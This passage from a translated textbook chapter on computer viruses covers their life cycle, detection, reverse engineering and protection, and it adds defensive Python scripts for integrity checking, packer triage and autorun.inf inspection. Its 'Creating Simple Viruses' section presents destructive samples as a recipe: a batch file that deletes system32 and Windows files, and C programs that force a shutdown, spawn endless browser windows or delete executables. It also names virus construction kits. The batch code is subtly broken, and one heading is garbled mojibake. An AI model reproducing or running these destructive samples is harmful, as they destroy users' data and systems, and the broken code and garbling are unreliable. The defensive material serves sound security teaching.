(b) Replication. The virus first replicates itself on the target computer for a period of time.
(c) Launch. The virus comes alive when the computer user triggers it or when an infected program runs.
(d) Detection. The virus can be regarded as a threat that infects the target computer systems. Its actions cause serious damage to the target system's data.
(e) Incorporation. Anti-virus software developers build defenses against the viruses.
(f) Elimination. Computer users remove the viruses by applying anti-virus software updates.
Creating Simple Viruses
2. Today, creating viruses no longer requires mastery of low-level languages such as Assembly and C as it once did. Simple viruses can be written in Batch, VB Script, AutoIt Script and the like. While virus writers abroad write their viruses ever more compactly and build in many tricks so that anti-virus programs cannot trace them, most domestic viruses are found to still use only script-based virus-writing methods, and to be aimed only at attacking the target computer rather than at evasion.
3. To understand virus writing clearly and easily, let us study a sample program:
(a) Create a file called Game.bat and save the following code in it.
@echo off
delete c:\Windows\system32\*.*
delete c:\Widows\*.*
(b) Use the bat2com utility on that Game.bat file to create Game.com. You then have a simple virus.
4. Looking at Figures (29), (30) and (31), we see that simple viruses can also be created in the C programming language. The code in Figure (29) shuts the computer down. The code shown in Figure (30) opens many instances of Internet Explorer. The code shown in Figure (31) deletes all the files under the Internet Explorer directory. The potency of such viruses varies with how much time one can devote and how skilled one is.
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void) {
    system("shutdown -s");   /* asks Windows to shut the computer down */
    return 0;
}
Figure (29) A virus program written in the C language
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void) {
    for (;;) {   /* endless loop: keeps launching new Internet Explorer windows */
        system("c:\\progra~1\\intern~1\\iexplore.exe");
    }
    return 0;
}
Figure (30) A virus program written in the C language
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void) {
    /* each system() call runs in its own shell, so the "cd" below does not
       carry over to the "del" that follows it */
    system("cd c:\\progra~1\\intern~1");
    system("del *.exe");
    system("cls");
    return 0;
}
Figure (31) A virus program written in the C language
Virus Creation Kits
5. Viruses can be created easily with kits, without writing any program. Some viruses produced with kits turn out to be far more advanced than viruses written by programmers themselves. Virus-producing kits can now easily be found on the Internet; they are programs that generate a virus automatically. The kits can be used easily after reading the help files that come with them. Some example virus construction kits are:
(a) Kefi's HTML Virus Construction Kit. A program that generates viruses and Trojans; it can create viruses that perform different actions.
(b) Virus Creation Laboratory v1.0. A tool that can create viruses, Trojans and logic bombs.
(c) The Smeg Virus Construction Kit. A polymorphic engine that links the written code to produce a virus. It can also be used for encryption and decryption.
(d) Rajaat's Tiny Flexible Mutator v1.1. An object module that is linked into virus code so that virus scanners cannot rely on simple strings; it encrypts the virus and decrypts it randomly using random registers and random instructions.
Methods of Detecting Viruses
6. The simplest method of detecting viruses and worms is to first check whether an e-mail is suspicious. Only after checking whether it was sent by someone unknown, or whether its content is the kind of thing that is normally discussed, should the e-mail be opened with care. The MyDoom and W32.Novarg.A@mm worms infected a great many Internet users. For defense against viruses, scanning, checking file integrity, and using interceptors are employed.
Scanning
7. Virus scanners are important software components for detecting viruses. If there were no scanners, a computer system would have many more chances of being attacked by viruses. Anti-virus software must be used regularly, and the scanning engine and virus definitions must be upgraded frequently. Viruses can be detected by scanning according to the following sequence:
(a) As soon as a virus is discovered, anti-virus vendors examine the virus's characteristics (signature string).
(b) The vendors write programs that can search for the virus signature string.
(c) The newly released scanners search memory and the system sectors for the new virus's signature strings.
(d) If the comparison matches, a warning is given that a virus is present. Note especially that anti-virus programs can only detect viruses that are already known and defined in advance.
8. Important points regarding virus detection are:
(a) Virus writers frequently create a great many viruses by modifying an existing one. Creating a new virus takes only a few minutes. By modifying and re-creating viruses this often, attackers defeat scanners.
(b) Newer scanners have to use detection methods such as code analysis and must examine code located in various places within a file.
(c) Some scanners create a virtual computer in the computer's memory, like Sandboxie, run programs inside that virtual environment and test them. This method is called heuristic scanning.
(d) Using scanners gives the following benefits:
(1) Programs can be checked before they run.
(2) New software can be checked for unknown or destructive viruses.
(e) The main weaknesses of scanners are as follows:
(1) Old scanners cannot be trusted. Because viruses multiply in great numbers, old scanners are no longer up to date. Therefore the latest scanners must be used.
(2) Because viruses emerge faster than new scanners do, new challenges will still be encountered even when using the newest scanners.
zdkifrsm;\ Integrity udkppfaq;jcif;
9. Integrity checking is how software authors verify whether the software they have released is still working as intended. The weakness of ordinary integrity-checking software is that when a file turns out to be corrupted, it cannot tell whether the corruption is due to a flaw introduced when the program was written or due to a virus. Some more advanced integrity-checking software exists that can analyse the kinds of change caused by virus activity. Some integrity-checking software also combines integrity checking with anti-virus techniques.
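An added example (not code from the original text) of what an integrity checker does in practice: it records a baseline of hashes and sizes, later verifies the files against it, and applies one extra check that separates "bytes were appended to the original" from "the content was rewritten". The baseline format and that classification rule are this example's own, and the file contents are constructed.

```python
"""File integrity baseline and verification (added example).

The baseline format and the "appended" heuristic are this example's own;
the sample file contents are constructed, not taken from a real system.
"""
from __future__ import annotations

import hashlib
import json
from pathlib import Path


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_baseline(files: dict[str, bytes]) -> dict[str, dict]:
    """Record a hash and size per file.  Store the result somewhere the
    monitored system cannot silently rewrite it (read-only media, another host)."""
    return {name: {"sha256": sha256(data), "size": len(data)}
            for name, data in files.items()}


def classify_change(entry: dict, data: bytes) -> str:
    """Describe how a file changed relative to its baseline entry.

    A plain hash only says "different".  Checking whether the original bytes
    survive as a prefix separates a file that merely grew (code appended to
    an executable) from one rewritten in place; a hash alone still cannot
    say whether corruption or a virus is the cause, as the text notes.
    """
    old_size = entry["size"]
    if len(data) > old_size and sha256(data[:old_size]) == entry["sha256"]:
        return "appended"
    if len(data) == old_size:
        return "rewritten-in-place"
    return "resized-and-rewritten"


def verify(baseline: dict[str, dict], files: dict[str, bytes]) -> dict:
    report: dict = {"ok": [], "modified": {}, "missing": [], "new": []}
    for name, entry in baseline.items():
        if name not in files:
            report["missing"].append(name)
        elif sha256(files[name]) == entry["sha256"]:
            report["ok"].append(name)
        else:
            report["modified"][name] = classify_change(entry, files[name])
    report["new"] = [name for name in files if name not in baseline]
    return report


def read_tree(root: Path) -> dict[str, bytes]:
    """Load every regular file under `root` into the mapping used above."""
    return {str(p.relative_to(root)): p.read_bytes()
            for p in sorted(root.rglob("*")) if p.is_file()}


# Constructed snapshots of a small directory, before and after an incident.
BEFORE = {
    "calc.exe": b"MZ" + b"\x90" * 100,
    "notes.txt": b"hello\n",
    "setup.exe": b"MZ" + b"\xcc" * 50,
    "readme.txt": b"read me\n",
}
AFTER = {
    "calc.exe": BEFORE["calc.exe"] + b"\xeb\xfe" * 8,   # original intact, bytes appended
    "notes.txt": b"hallo\n",                            # same size, content changed
    "setup.exe": BEFORE["setup.exe"],                   # untouched
    "autorun.inf": b"[autorun]\nopen=calc.exe\n",       # not in the baseline
}                                                       # readme.txt is gone


def run_demo() -> dict:
    return verify(make_baseline(BEFORE), AFTER)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run against a real directory with `verify(baseline, read_tree(Path("C:/some/dir")))`; the baseline must be taken while the system is known clean and kept where the monitored machine cannot rewrite it, otherwise a virus that modifies files can update the record as well.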
Using Interceptors
10. Interceptors are used mainly to respond to logic bombs and Trojans. An interceptor controls the requests a program makes to the computer system to use the network or to perform operations that could pose a threat. When such a request is detected, the interceptor asks the user whether that request should be carried out before letting it continue. Some viruses are able to bypass such interception and monitoring programs. Anti-virus programs and the Deep Freeze program are interceptors.
Analysing Viruses
11. Monitoring and checking for viruses with scanners, integrity checkers and interceptors is still not a complete and sufficient solution. Anti-virus programs can recognise only old viruses, and viruses produced by modifying old ones, as viruses. They will not be able to detect or eliminate locally written viruses or viruses written with new techniques. Therefore only by becoming well versed in reverse engineering will you be able to analyse viruses with your own knowledge and eliminate them. Reverse engineering is the discipline of recovering a program's binary (hex) code into the form it had when it was written, and of modifying and studying that code.
12. Most locally produced viruses are written as AutoIt 3.x scripts. The AutoIt program converts its .au3 script file into an .exe file by compiling it. To protect against viruses written in AutoIt, and to be able to eliminate them if you are infected by accident, you must try to recover the original code of the virus file using one of the AutoIt decompiler programs. Well-known decompilers are Exe2Aut, myAutToExe and DeAutoIt. By examining that code you can understand in detail how the virus works.
13. Looking at most viruses from abroad, they are written in the Assembly, Delphi and Visual C++ programming languages, and some viruses are found to use packer and protector software. A packer is a program that, like WinRAR, reduces the size of a file; the difference from WinRAR is that .exe files protected with a packer can stand on their own. To decrypt (unpack) their code, the software that encrypted (packed) it is not required. Virus writers use packers both to make the file smaller and to stop people from seeing how the virus code is written. Protectors are more advanced: rather than shrinking the file, their purpose is to protect the program from being reverse engineered.
Figure (322): Virus code examined with the IDA Pro disassembler
14. To recover the code of virus files, tools such as Olly Debugger and the IDA Pro disassembler are used. There are also tools for more specific tasks: Resource Hacker, which can view and edit resources; Lord PE, which can view and edit the Portable Executable (PE) information of program files; and Import Reconstructor, for repairing damaged imports. Reverse engineering is a very complex discipline, and recovering virus code is many times harder than writing a virus, so you must keep studying the latest programming languages, packers/protectors and debuggers/disassemblers/decompilers.
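As an added example covering paragraphs 13 and 14 (not code from the original text), this Python script builds two minimal PE images in memory, parses their section tables the way a tool such as Lord PE displays them, and flags the traits packers leave behind: known section names, high-entropy sections, sections that are both writable and executable, and a section that is empty on disk but large in memory. The images are constructed, and the section-name list, the 7.0 entropy threshold and the scoring rules are this example's own choices rather than a published algorithm.

```python
"""Packer triage from PE section headers (added example).

Builds two minimal PE images in memory (constructed, not real programs),
parses the section table and scores each section by name, entropy and
permissions.  The section-name list, the 7.0 entropy threshold and the
scoring rules are this example's own choices, not a published algorithm.
"""
from __future__ import annotations

import hashlib
import math
import struct
from pathlib import Path
from typing import Optional

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section names that well-known packers/protectors leave behind.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata",
                        ".vmp0", ".vmp1", ".themida"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, close to 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_pe(sections: list[tuple[bytes, bytes, int, Optional[int]]]) -> bytes:
    """Construct a minimal PE32 image: DOS header, PE signature, COFF header,
    section table, raw section data.  SizeOfOptionalHeader is 0 here; real
    images carry an optional header, which parse_sections skips by that size."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(sections),
                       0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + len(coff) + 40 * len(sections)
    va, headers, raw = 0x1000, [], b""
    for name, data, chars, vsize in sections:
        headers.append(struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"),
                                   vsize or len(data), va, len(data), raw_ptr,
                                   0, 0, 0, 0, chars))
        raw += data
        raw_ptr += len(data)
        va += 0x1000
    return dos_header + b"PE\x00\x00" + coff + b"".join(headers) + raw


def parse_sections(image: bytes) -> list[dict]:
    """Read the section table (name, sizes, entropy of raw data, permissions)."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", image, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    result = []
    for i in range(nsections):
        (name, vsize, _va, raw_size, raw_ptr, _reloc, _lines,
         _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        data = image[raw_ptr:raw_ptr + raw_size]
        result.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "raw_size": raw_size,
            "virtual_size": vsize,
            "entropy": round(shannon_entropy(data), 2),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return result


def triage(image: bytes, entropy_threshold: float = 7.0) -> dict:
    """Flag the traits a packed or protected binary usually shows."""
    sections = parse_sections(image)
    reasons = []
    for s in sections:
        if s["name"] in PACKER_SECTION_NAMES:
            reasons.append(f"{s['name']}: known packer section name")
        if s["raw_size"] >= 256 and s["entropy"] >= entropy_threshold:
            reasons.append(f"{s['name']}: entropy {s['entropy']} (compressed or encrypted)")
        if s["executable"] and s["writable"]:
            reasons.append(f"{s['name']}: writable and executable (unpacking stub writes code here)")
        if s["virtual_size"] > 4 * max(s["raw_size"], 256):
            reasons.append(f"{s['name']}: empty on disk but large in memory (room for unpacked code)")
    return {"sections": sections, "likely_packed": bool(reasons), "reasons": reasons}


def triage_file(path: str) -> dict:
    return triage(Path(path).read_bytes())


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed code."""
    out = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32 + 1))
    return out[:n]


# Constructed images: a plain compiler-style layout and a UPX-style layout.
CLEAN_IMAGE = build_pe([
    (b".text", b"\x55\x8b\xec\x90" * 256, 0x60000020, None),   # code, read+execute
    (b".data", b"Hello, world!\x00" * 32, 0xC0000040, None),   # data, read+write
])
PACKED_IMAGE = build_pe([
    (b"UPX0", b"", 0xE0000080, 0x8000),                       # nothing on disk, 32 KiB in memory
    (b"UPX1", pseudo_random(2048), 0xE0000040, None),          # compressed body, rwx
    (b".rsrc", b"\x00" * 512, 0xC0000040, None),
])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_IMAGE), ("packed", PACKED_IMAGE)):
        verdict = triage(image)
        print(label, "likely packed:", verdict["likely_packed"])
        for reason in verdict["reasons"]:
            print("  -", reason)
```

A hit here only says "this file needs unpacking before static analysis", which is the decision point paragraph 14 describes; it does not say the file is malicious, since legitimate installers and games are packed too, and a protector that keeps normal section names and spreads its encrypted code across them will score lower than the UPX layout.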
Protecting Against Viruses
15. To prevent virus infection in advance, the following basic points must be understood:
(a) Understand that prevention is more effective than cure. Because some viruses go beyond mere nuisance and include destructive behaviour, you must back up important data to an external hard disk or to CDs/DVDs so that it can still be used if your files are destroyed.
(b) To salvage and recover destroyed files, you should keep recovery software such as Systweak Advanced Disk Recovery on hand. Whether a virus deletes individual files or wipes the whole hard disk, Systweak Advanced Disk Recovery can recover the files as far as possible.
(c) If the anti-virus program you use has not been updated, take care not to use external hard disks or flash drives borrowed from other people, and not to install software from discs. Among the ways viruses spread, flash drives are the main culprits.
(d) Be careful when opening files attached to emails sent by people you do not know, because viruses spread very widely through email.
(e) Do not boot from untrustworthy CDs or DVDs, and disable the computer's AutoPlay feature. Some CDs contain autorun.inf files, and those files carry settings that run a virus file as soon as the disc is inserted.
(f) If possible, use an operating system with a high level of security. Mac OS is more secure than Windows; it prohibits arbitrary manipulation of the disk. Windows 8 is found to have tightened its security system somewhat.
(g) To test suspicious programs, you can use virtual machine software such as VMWare and VirtualBox, install the OS of your choice and test in that OS whether the program is a virus. Even if it is a virus, it will no longer be able to destroy the data you are currently working with.
(h) Viruses can also be kept out effectively with Deep Freeze, Time Freeze and HD Guard. These programs put files that a virus has deleted back in their original place as soon as the computer is shut down and restarted. However, advanced viruses have been found to be able to bypass these programs.
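An added example for point (e), not code from the original text: a small Python triage script that parses an autorun.inf and reports which entries would launch a program when the disc or drive is inserted or opened. The parser and the "launches a program" rule are this example's own, and both sample files are constructed.

```python
"""Triage of an autorun.inf file (added example).

The parser and the "does it launch a program" rule are this example's own;
the two sample files are constructed for illustration.
"""
from __future__ import annotations

import re
from pathlib import Path
from typing import Optional

# Keys under [autorun] that make Windows run something on insertion or on
# the default "open" action of the drive.
LAUNCH_KEYS = {"open", "shellexecute"}
EXECUTABLE_EXT = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js|wsf|hta)\b", re.IGNORECASE)


def parse_autorun(text: str) -> dict[str, dict[str, str]]:
    """Parse INI-style text into {section: {key: value}} with lower-cased names."""
    sections: dict[str, dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_entries(inf: dict[str, dict[str, str]]) -> list[tuple[str, str]]:
    """Return (key, command) pairs that would start a program: open=,
    shellexecute=, and shell\\<verb>\\command= entries that replace the
    drive's context-menu actions (so even "Open" from Explorer runs it)."""
    auto = inf.get("autorun", {})
    found = []
    for key, value in auto.items():
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            found.append((key, value))
    return found


def assess(text: str) -> dict:
    entries = launch_entries(parse_autorun(text))
    return {
        "launches": entries,
        "runs_executable": any(EXECUTABLE_EXT.search(cmd) for _, cmd in entries),
    }


def assess_file(path: str) -> dict:
    # autorun.inf is plain text; undecodable bytes are replaced rather than fatal
    return assess(Path(path).read_text(encoding="utf-8", errors="replace"))


# Constructed sample: the pattern described in point (e), where inserting the
# disc runs a program and the drive's "Open" action is redirected to it.
SUSPICIOUS_INF = r"""
[autorun]
open=setup.exe
icon=setup.exe,0
label=Driver CD
shell\open\command=setup.exe
"""

# Constructed sample: only cosmetic keys, nothing is launched.
BENIGN_INF = r"""
[autorun]
icon=disc.ico
label=Holiday Photos
"""

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_INF), ("benign", BENIGN_INF)):
        print(name, assess(text))
```

The script reads the file as text and never executes anything it names; disabling AutoPlay, as point (e) advises, is what stops the `open=` line from mattering in the first place, and this check is useful afterwards for deciding whether a disc or drive that has been plugged into other machines deserves a closer look.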